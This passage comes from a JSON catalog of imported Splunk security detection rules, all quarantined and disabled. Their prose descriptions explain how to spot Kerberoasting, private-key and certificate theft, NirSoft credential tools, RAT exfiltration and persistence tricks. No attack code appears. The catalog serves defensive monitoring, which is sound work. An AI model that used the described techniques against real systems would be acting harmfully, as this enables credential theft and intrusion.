If confirmed malicious, this could lead to unauthorized resource creation, potential data exfiltration, or further compromise of cloud infrastructure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cloud-provisioning-activity-from-previously-unseen-region.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5aba1860-9617-4af9-b19d-aecac16fe4f2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/cloud_provisioning_activity_from_previously_unseen_region.yml" } }, { "id": "splunk-security-content-5adbc5f1-9a2f-41c1-a810-f37e015f8179", "type": "detection", "name": "Notepad with no Command Line Arguments", "description": "The following analytic identifies instances where Notepad.exe is launched without any command line arguments, a behavior commonly associated with the SliverC2 framework. This detection leverages process creation events from Endpoint Detection and Response (EDR) agents, focusing on processes initiated by Notepad.exe within a short time frame. This activity is significant as it may indicate an attempt to inject malicious code into Notepad.exe, a known tactic for evading detection. 
If confirmed malicious, this could allow an attacker to execute arbitrary code, potentially leading to system compromise and unauthorized access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/notepad-with-no-command-line-arguments.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5adbc5f1-9a2f-41c1-a810-f37e015f8179", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/notepad_with_no_command_line_arguments.yml" } }, { "id": "splunk-security-content-5b2f4596-7d4c-11ec-88a7-acde48001122", "type": "detection", "name": "Windows NirSoft Utilities", "description": "The following analytic identifies the execution of commonly used NirSoft utilities on Windows systems.\nIt leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution details such as process name, parent process, and command-line arguments.\nThis activity is significant for a SOC because NirSoft utilities, while legitimate, can be used by adversaries for malicious purposes like credential theft or system reconnaissance.\nIf confirmed malicious, this activity could lead to unauthorized access, data exfiltration, or further system compromise.\nNote that this search does not use a where clause to filter out known benign paths, as NirSoft utilities can be executed from various locations. 
This might hinder performance in environments with high data volumes.\nApply additional filtering as necessary to enhance this.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1588.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-nirsoft-utilities.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5b2f4596-7d4c-11ec-88a7-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_nirsoft_utilities.yml" } }, { "id": "splunk-security-content-5b367cdd-8dfc-49ac-a9b7-6406cf27f33e", "type": "detection", "name": "O365 Security And Compliance Alert Triggered", "description": "The following analytic identifies alerts triggered by the Office 365 Security and Compliance Center, indicating potential threats or policy violations. It leverages data from the `o365_management_activity` dataset, focusing on events where the workload is SecurityComplianceCenter and the operation is AlertTriggered. This activity is significant as it highlights security and compliance issues within the O365 environment, which are crucial for maintaining organizational security. 
If confirmed malicious, these alerts could indicate attempts to breach security policies, leading to unauthorized access, data exfiltration, or other malicious activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-security-and-compliance-alert-triggered.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5b367cdd-8dfc-49ac-a9b7-6406cf27f33e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_security_and_compliance_alert_triggered.yml" } }, { "id": "splunk-security-content-5b3f63a3-865b-4637-9941-f98bd1a50c0d", "type": "detection", "name": "ASL AWS UpdateLoginProfile", "description": "The following analytic detects an AWS CloudTrail event where a user with permissions updates the login profile of another user. It leverages CloudTrail logs to identify instances where the user making the change is different from the user whose profile is being updated. This activity is significant because it can indicate privilege escalation attempts, where an attacker uses a compromised account to gain higher privileges. 
If confirmed malicious, this could allow the attacker to escalate their privileges, potentially leading to unauthorized access and control over sensitive resources within the AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-updateloginprofile.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5b3f63a3-865b-4637-9941-f98bd1a50c0d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_updateloginprofile.yml" } }, { "id": "splunk-security-content-5ba382c4-2105-11ec-8d8f-acde48001122", "type": "detection", "name": "Time Provider Persistence Registry", "description": "The following analytic detects suspicious modifications to the time provider registry for persistence and autostart. It leverages data from the Endpoint.Registry data model, focusing on changes to the \"CurrentControlSet\\\\Services\\\\W32Time\\\\TimeProviders\" registry path. This activity is significant because such modifications are uncommon and can indicate an attempt to establish persistence on a compromised host. 
If confirmed malicious, this technique allows an attacker to maintain access and execute code automatically upon system boot, potentially leading to further exploitation and control over the affected system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/time-provider-persistence-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5ba382c4-2105-11ec-8d8f-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/time_provider_persistence_registry.yml" } }, { "id": "splunk-security-content-5be109e6-1ac5-11ec-b421-acde48001122", "type": "detection", "name": "Suspicious WAV file in Appdata Folder", "description": "The following analytic detects the creation of .wav files in the AppData folder, a behavior associated with Remcos RAT malware, which stores audio recordings in this location for data exfiltration. The detection leverages endpoint process and filesystem data to identify .wav file creation within the AppData\\Roaming directory. This activity is significant as it indicates potential unauthorized data collection and exfiltration by malware. 
If confirmed malicious, this could lead to sensitive information being sent to an attacker's command and control server, compromising the affected system's confidentiality.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1113" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-wav-file-in-appdata-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5be109e6-1ac5-11ec-b421-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_wav_file_in_appdata_folder.yml" } }, { "id": "splunk-security-content-5c1c2877-06c0-40ee-a1a2-db71f1372b5b", "type": "detection", "name": "Windows Private Keys Discovery", "description": "The following analytic identifies processes that retrieve information related to private key files, often used by post-exploitation tools like winpeas. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions that search for private key certificates. This activity is significant as it indicates potential attempts to locate insecurely stored credentials, which adversaries can exploit for privilege escalation, persistence, or remote service authentication. 
If confirmed malicious, this behavior could allow attackers to access sensitive information, escalate privileges, or maintain persistence within the compromised environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-private-keys-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5c1c2877-06c0-40ee-a1a2-db71f1372b5b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_private_keys_discovery.yml" } }, { "id": "splunk-security-content-5c2c02d8-bee7-4f5c-9dea-e3e1012daddb", "type": "detection", "name": "Crowdstrike Multiple LOW Severity Alerts", "description": "The following analytic detects multiple CrowdStrike LOW severity alerts, indicating a series of minor suspicious activities or policy violations. These alerts are not immediately critical but should be reviewed to prevent potential threats. They often highlight unusual behavior or low-level risks that, if left unchecked, could escalate into more significant security issues. 
Regular monitoring and analysis of these alerts are essential for maintaining robust security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/crowdstrike-multiple-low-severity-alerts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5c2c02d8-bee7-4f5c-9dea-e3e1012daddb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/crowdstrike_multiple_low_severity_alerts.yml" } }, { "id": "splunk-security-content-5c7ee6ad-baf4-44fb-b2f0-0cfeddf82dbc", "type": "detection", "name": "Windows User Execution Malicious URL Shortcut File", "description": "The following analytic detects the creation of URL shortcut files, often used by malware like CHAOS ransomware. It leverages the Endpoint.Filesystem datamodel to identify \".url\" files created outside common directories, such as \"Program Files\". This activity can be significant as \".URL\" files can be used as a means to trick the user into visiting certain websites unknowingly, or when placed in certain locations such as \"\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\\", it may allow the execution of malicious code upon system reboot. 
If confirmed malicious, this could allow an attacker to achieve persistence and execute harmful payloads, potentially leading to further system compromise and data loss.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-user-execution-malicious-url-shortcut-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5c7ee6ad-baf4-44fb-b2f0-0cfeddf82dbc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_user_execution_malicious_url_shortcut_file.yml" } }, { "id": "splunk-security-content-5ca7ebee-4ee7-4cf2-b3be-0ea26a00d822", "type": "detection", "name": "Microsoft Intune Manual Device Management", "description": "Microsoft Intune device management configuration policies, scripts & apps are all tools administrators can use to remotely manage Intune-managed devices. Instead of waiting for the devices to poll for changes to policies, the policies can be manually pushed to expedite delivery. While this may be useful in a pinch, it may also be a sign of an impatient attacker trying to speed up the delivery of their payload. 
This detection identifies when device management configuration policy sync events or on-demand remediation scripts are triggered, or when devices are remotely restarted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.007", "T1072", "T1529" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/microsoft-intune-manual-device-management.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5ca7ebee-4ee7-4cf2-b3be-0ea26a00d822", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/microsoft_intune_manual_device_management.yml" } }, { "id": "splunk-security-content-5cc67381-44fa-4111-8a37-7a230943f027", "type": "detection", "name": "Kerberoasting spn request with RC4 encryption", "description": "The following analytic detects potential Kerberoasting attacks by identifying Kerberos service ticket requests with RC4 encryption through Event ID 4769. It leverages specific Ticket_Options values commonly used by Kerberoasting tools. This activity is significant as Kerberoasting allows attackers to request service tickets for domain accounts, typically service accounts, and crack them offline to gain privileged access. 
If confirmed malicious, this could lead to unauthorized access, privilege escalation, and further compromise of the Active Directory environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1558.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kerberoasting-spn-request-with-rc4-encryption.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5cc67381-44fa-4111-8a37-7a230943f027", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/kerberoasting_spn_request_with_rc4_encryption.yml" } }, { "id": "splunk-security-content-5ced34b4-ab32-4bb0-8f22-3b8f186f0a38", "type": "detection", "name": "Potential password in username", "description": "The following analytic identifies instances where users may have mistakenly entered their passwords in the username field during authentication attempts. It detects this by analyzing failed authentication events with usernames longer than 7 characters and high Shannon entropy, followed by a successful authentication from the same source to the same destination. This activity is significant as it can indicate potential security risks, such as password exposure. 
If confirmed malicious, attackers could exploit this to gain unauthorized access, leading to potential data breaches or further compromise of the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.003", "T1552.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/potential-password-in-username.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5ced34b4-ab32-4bb0-8f22-3b8f186f0a38", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/potential_password_in_username.yml" } }, { "id": "splunk-security-content-5d4d2cd2-7b65-4474-97cf-e9b203bcd770", "type": "detection", "name": "ESXi Malicious VIB Forced Install", "description": "Detects potentially malicious installation of VMware Installation Bundles (VIBs) using the --force flag. The --force option bypasses signature and compatibility checks, allowing unsigned, community-supported, or incompatible VIBs to be installed on an ESXi host. 
This behavior is uncommon in normal administrative operations and is often observed in post-compromise scenarios where adversaries attempt to install backdoored or unauthorized kernel modules, drivers, or monitoring tools to establish persistence or gain deeper control of the hypervisor.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1505.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/esxi-malicious-vib-forced-install.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5d4d2cd2-7b65-4474-97cf-e9b203bcd770", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/esxi_malicious_vib_forced_install.yml" } }, { "id": "splunk-security-content-5d814af1-1041-47b5-a9ac-d754e82e9a26", "type": "detection", "name": "Process Creating LNK file in Suspicious Location", "description": "The following analytic detects a process creating a `.lnk` file in suspicious locations such as `C:\\User*` or `*\\Local\\Temp\\*`.\nIt leverages filesystem and process activity data from the Endpoint data model to identify this behavior.\nThis activity can be significant because creating `.lnk` files in these directories is a common indicator of spear phishing tools to establish persistence or execute malicious payloads.\nIf confirmed malicious, this could allow an attacker to maintain persistence, execute arbitrary code, or further compromise the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", 
"mitre_techniques": [ "T1566.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/process-creating-lnk-file-in-suspicious-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5d814af1-1041-47b5-a9ac-d754e82e9a26", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/process_creating_lnk_file_in_suspicious_location.yml" } }, { "id": "splunk-security-content-5d8bb1f0-f65a-4b4e-af2e-fcdb88276314", "type": "detection", "name": "Azure AD Multiple AppIDs and UserAgents Authentication Spike", "description": "The following analytic detects unusual authentication activity in Azure AD, specifically when a single user account has over 8 authentication attempts using 3+ unique application IDs and 5+ unique user agents within a short period. It leverages Azure AD audit logs, focusing on authentication events and using statistical thresholds. This behavior is significant as it may indicate an adversary probing for MFA requirements. If confirmed malicious, it suggests a compromised account, potentially leading to further exploitation, lateral movement, and data exfiltration. 
Early detection is crucial to prevent substantial harm.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-multiple-appids-and-useragents-authentication-spike.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5d8bb1f0-f65a-4b4e-af2e-fcdb88276314", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_multiple_appids_and_useragents_authentication_spike.yml" } }, { "id": "splunk-security-content-5d93894e-befa-4429-abde-7fc541020b7b", "type": "detection", "name": "Windows Multiple Accounts Disabled", "description": "The following analytic identifies instances where more than five unique Windows accounts are disabled within a 10-minute window, as indicated by Event Code 4725 in the Windows Security Event Log. It leverages the wineventlog_security dataset, grouping data into 10-minute segments and tracking the count and distinct count of TargetUserName. This behavior is significant as it may indicate internal policy breaches or an external attacker's attempt to disrupt operations. 
If confirmed malicious, this activity could lead to widespread account lockouts, hindering user access and potentially disrupting business operations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098", "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-multiple-accounts-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5d93894e-befa-4429-abde-7fc541020b7b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_multiple_accounts_disabled.yml" } }, { "id": "splunk-security-content-5d9c6eee-988c-11eb-8253-acde48001122", "type": "detection", "name": "WinEvent Scheduled Task Created Within Public Path", "description": "The following analytic detects the creation of scheduled tasks within user-writable paths using Windows Security EventCode 4698. It identifies tasks registered via schtasks.exe or TaskService that execute commands from directories like Public, ProgramData, Temp, and AppData. This behavior is significant as it may indicate an attempt to establish persistence or execute unauthorized commands. 
If confirmed malicious, an attacker could maintain long-term access, escalate privileges, or execute arbitrary code, posing a severe threat to system integrity and security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/winevent-scheduled-task-created-within-public-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5d9c6eee-988c-11eb-8253-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/winevent_scheduled_task_created_within_public_path.yml" } }, { "id": "splunk-security-content-5db16825-81bd-4923-a8d6-d6a13a59832a", "type": "detection", "name": "Linux Auditd System Network Configuration Discovery", "description": "The following analytic detects suspicious system network configuration discovery activities, which may indicate an adversary's attempt to gather information about the network environment. Such actions typically involve commands or tools used to identify network interfaces, routing tables, and active connections. Detecting these activities is crucial, as they often precede more targeted attacks like lateral movement or data exfiltration. 
By identifying unusual or unauthorized network discovery efforts, this analytic helps security teams to swiftly detect and respond to potential reconnaissance operations, mitigating the risk of further compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1016" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-system-network-configuration-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5db16825-81bd-4923-a8d6-d6a13a59832a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_system_network_configuration_discovery.yml" } }, { "id": "splunk-security-content-5df35d50-e1a3-4a52-a337-92e69d9b1b8a", "type": "detection", "name": "Windows PowerShell Process With Malicious String", "description": "The following analytic detects the execution of multiple offensive toolkits and commands through the process execution datamodel. This method captures commands given directly to powershell.exe, allowing for the identification of suspicious activities including several well-known tools used for credential theft, lateral movement, and persistence. 
If confirmed malicious, this could lead to unauthorized access, privilege escalation, and potential compromise of sensitive information within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powershell-process-with-malicious-string.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5df35d50-e1a3-4a52-a337-92e69d9b1b8a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powershell_process_with_malicious_string.yml" } }, { "id": "splunk-security-content-5dfaa3d3-e2e4-4053-8252-16d9ee528c41", "type": "detection", "name": "Azure AD Privileged Role Assigned to Service Principal", "description": "The following analytic detects the assignment of privileged roles to service principals in Azure Active Directory (AD). It leverages the AuditLogs log category from ingested Azure AD events. This activity is significant because assigning elevated permissions to non-human entities can lead to unauthorized access or malicious activities. If confirmed malicious, attackers could exploit these service principals to gain elevated access to Azure resources, potentially compromising sensitive data and critical infrastructure. 
Monitoring this behavior helps prevent privilege escalation and ensures the security of Azure environments.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-privileged-role-assigned-to-service-principal.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5dfaa3d3-e2e4-4053-8252-16d9ee528c41", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_privileged_role_assigned_to_service_principal.yml" } }, { "id": "splunk-security-content-5e06e262-d7cd-4216-b2f8-27b437e18458", "type": "detection", "name": "Detect Outbound LDAP Traffic", "description": "The following analytic identifies outbound LDAP traffic to external IP addresses. It leverages the Network_Traffic data model to detect connections on ports 389 or 636 that are not directed to private IP ranges (RFC1918). This activity is significant because outbound LDAP traffic can indicate potential data exfiltration or unauthorized access attempts. 
If confirmed malicious, attackers could exploit this to access sensitive directory information, leading to data breaches or further network compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-outbound-ldap-traffic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5e06e262-d7cd-4216-b2f8-27b437e18458", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/detect_outbound_ldap_traffic.yml" } }, { "id": "splunk-security-content-5e0b1936-8f99-4399-8ee2-9edc5b32e170", "type": "detection", "name": "Windows Screen Capture Via Powershell", "description": "The following analytic detects the execution of a PowerShell script designed to capture screen images on a host. It leverages PowerShell Script Block Logging to identify specific script block text patterns associated with screen capture activities. This behavior is significant as it may indicate an attempt to exfiltrate sensitive information by capturing desktop screenshots. 
If confirmed malicious, this activity could allow an attacker to gather visual data from the compromised system, potentially leading to data breaches or further exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1113" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-screen-capture-via-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5e0b1936-8f99-4399-8ee2-9edc5b32e170", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_screen_capture_via_powershell.yml" } }, { "id": "splunk-security-content-5e38bd3e-5da7-483d-aa61-27f7e8c27ad1", "type": "detection", "name": "Windows WMI Reconnaissance Class Query", "description": "The following analytic detects the use of WMIC (Windows Management Instrumentation Command-line) for reconnaissance and system information discovery on Windows endpoints.\nIt identifies command-line queries targeting common Win32 WMI classes such as Win32_OperatingSystem, Win32_Processor, csproduct, Win32_DiskDrive, and Win32_PhysicalMemory, which are frequently leveraged to enumerate hardware, operating system details, and system configuration. Adversaries often use these queries during post-exploitation to fingerprint hosts, assess virtualization, and tailor follow-on activity. 
While WMIC usage can be legitimate for administrative and inventory tasks, suspicious or unexpected execution\u2014particularly by non-administrative users or uncommon parent processes\u2014may indicate malicious reconnaissance aligned with system discovery techniques.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-wmi-reconnaissance-class-query.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5e38bd3e-5da7-483d-aa61-27f7e8c27ad1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_wmi_reconnaissance_class_query.yml" } }, { "id": "splunk-security-content-5e38ded4-c964-41f4-8cb6-4a1a53c6929f", "type": "detection", "name": "Windows PowerShell Export Certificate", "description": "The following analytic detects the use of the PowerShell Cmdlet `export-certificate` by leveraging Script Block Logging. This activity is significant as it may indicate an adversary attempting to exfiltrate certificates from the local Certificate Store on a Windows endpoint. 